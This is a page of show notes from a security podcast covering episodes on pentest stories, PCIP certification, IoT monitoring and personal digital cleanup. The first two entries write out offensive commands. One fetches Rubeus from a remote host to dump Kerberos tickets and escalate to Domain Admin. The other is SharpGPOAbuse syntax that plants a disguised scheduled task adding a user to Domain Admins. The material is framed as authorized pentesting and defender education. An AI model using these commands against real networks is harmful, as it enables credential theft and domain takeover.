7MS #9: Information Security for the Whole Family (audio)

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: Great blue team tools alerting our customer to a lot of the stuff we were doing An EDR that we tried to beat up (but it beat us up instead) SharpGPOAbuse which we talked about extensively last week Separation of "everyday" accounts from privileged accounts Multi-factor authentication bypass! Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

19 Marras 20201h 9min

Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features: A little welcome music that is not the usual scatting of gibberish I torture you with Some cool tools I'm playing with in the lab that we'll do future episodes on in the future: DetectionLab to practice detecting all the bad things! BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want. Cobalt Strike - we're doing a demo right now! Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run: SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access" This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update either the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me. If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.

15 Marras 202039min

Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include: We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender! Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more! Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!

8 Marras 202033min

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified! Today's great cyber stories include: Azure AD is a single point of failure in many networks Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-) P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!

29 Loka 20201h 9min

Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover: Study materials that helped me prepare: PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!) Flashcards from Cram Flashcards from Quizlet My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested) Flashcards from ProProfs Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).

21 Loka 202038min

Hello! This episode is a true homecoming in that I actually recorded it from home. Yay! WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!! With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs! Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it. Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory. The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible? Songs sung in this episode include: Follow Through by Gavin DeGraw Livin' on a Prayer The Look that Says You Love Me (Brian Johnson) Goodness of God

14 Loka 202039min

Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include: Double-check that any device you have that supports full-disk encryption has it enabled On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years) Got old PCs sitting around you're not using? Nuke 'em with DBAN. Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!) Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly Handling password hashes? Here's one way to setup an encrypted partition for them You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird

7 Loka 202048min

Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really): Nagios - it's old school but gets the job done. This article helped me get it going on an RPi. SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!

2 Loka 202041min